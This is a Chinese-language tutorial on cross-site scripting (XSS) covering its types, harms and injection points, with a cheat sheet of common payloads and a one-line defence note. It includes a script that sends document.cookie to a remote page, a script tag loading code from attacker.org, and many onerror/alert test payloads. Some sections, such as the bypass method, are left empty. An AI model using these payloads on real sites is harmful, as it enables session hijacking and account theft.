xss漏洞原理应用及常用payload总结

xss简介

XSS攻击全称跨站脚本攻击（Cross Site Scripting），但为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆，故将跨站脚本攻击缩写为XSS，通常指黑客通过“HTML注入”篡改了网页，插入了恶意的脚本，从而在用户浏览网页时，控制用户浏览器的一种攻击。一般只要有用户输入的地方，就可能会出现XSS漏洞。

可能造成的危害

• 网站弹框（刷流量）
• 网站挂马
• 会话劫持
• 控制目标数据
• Cookie被盗取
• 用户提权
• 账号被盗
• 强制发送电子邮件
• 尽量DDOS
• 蠕虫攻击等

xss分类

• 反射型XSS
• 存储型XSS
• DOM型XSS

三种类型比较：

攻击原理

反射型xss攻击原理
反射型XSS又称非持久型XSS，攻击方式仅具有一次性。反射型XSS只是简单地把用户输入的数据“反射”给浏览器。也就是说，黑客往往需要诱使用户“点击”一个恶意链接，才能攻击成功。

存储型xss攻击原理
存储型XSS会把用户输入的数据“存储”在服务器端。这种XSS具有很强的稳定性。比较常见的一个场景就是，黑客写下一篇包含有恶意JavaScript代码的博客文章，文章发表后，所有访问该博客文章的用户，都会在他们的浏览器中执行这段恶意的JavaScript代码。每当有用户访问该页面的时候都会触发代码执行，这种XSS非常危险，容易造成蠕虫，大量盗窃cookie

DOM型xss攻击原理
基于文档对象模型Document Objeet Model，DOM)的一种漏洞。DOM是一个与平台、编程语言无关的接口，它允许程序或脚本动态地访问和更新文档内容、结构和样式，处理后的结果能够成为显示页面的一部分。DOM中有很多对象，其中一些是用户可以操纵的，如uRI ，location，refelTer等。客户端的脚本程序可以通过DOM动态地检查和修改页面内容，它不依赖于提交数据到服务器端，而从客户端获得DOM中的数据在本地执行，如果DOM中的数据没有经过严格确认，就会产生DOM XSS漏洞。

漏洞利用

1.盗取cookie：
2.构造页面跳转：
3.构造获取cookie并发送到远程主机：

<script>document.location='http://127.0.0.1/test/cookie.phpcookie='+document.cookie</script>

常见注入点

• 输入框
• 留言板
• URL中可传参数的变量

常用Payload

Script标签：

<script>alert(/1/)</script>
<script>prompt(1)</script> 
<script>confirm(1)</script>
<script src="http://attacker.org/malicious.js"></script>
<script src=data:text/javascript,alert(1)></script>
<script>setTimeout(alert(1),0)</script>

Img标签：

<img src=x onerror=alert(1)>
<img src=x onerror=prompt(1);>
<img src=javascript:alert('1')>

a标签：

<a href=”javascript:alert(1)”>点击触发</a>
<a href="http://www.hacker.com">点击触发</a>

Iframe标签：

<iframe src="javascript:alert(1)">
<iframe onload=alert(1)>

其他标签：

<video src=x onerror=prompt(1);>
<audio src=x onerror=prompt(1);>

常用事件：
onclick: 点击触发 （）
onerror: 当 src 加载不出来时触发 （）
onload: 当 src 加载完毕触发（）
onmouseover：鼠标指针移动到图片后触发（）
onmousemove: 鼠标指针移到指定的元素后触发（）
onfocus: 当 input 输入框获取焦点时触发（）

常用属性：
src
action
href
data
content

javascript弹窗函数：
alert()
confirm()
prompt()

常用绕过方法

1.大小写绕过（）

Xss漏洞的防范

不信任任何用户的输入，对每个用户的输入都做严格检查，过滤，在输出的时候，对某些特殊字符进行转义，替换等